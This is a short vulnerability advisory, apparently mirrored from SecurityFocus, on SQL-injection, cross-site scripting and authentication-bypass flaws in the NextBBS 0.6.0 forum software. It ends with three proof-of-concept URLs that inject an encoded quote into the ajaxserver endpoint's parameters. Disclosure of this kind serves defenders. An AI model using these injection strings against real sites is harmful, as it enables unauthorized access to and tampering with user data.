11 lines
No EOL
831 B
Text
11 lines
No EOL
831 B
Text
source: https://www.securityfocus.com/bid/52728/info
|
|
|
|
NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability.
|
|
|
|
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system.
|
|
|
|
NextBBS 0.6.0 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
|
|
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
|
|
http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe |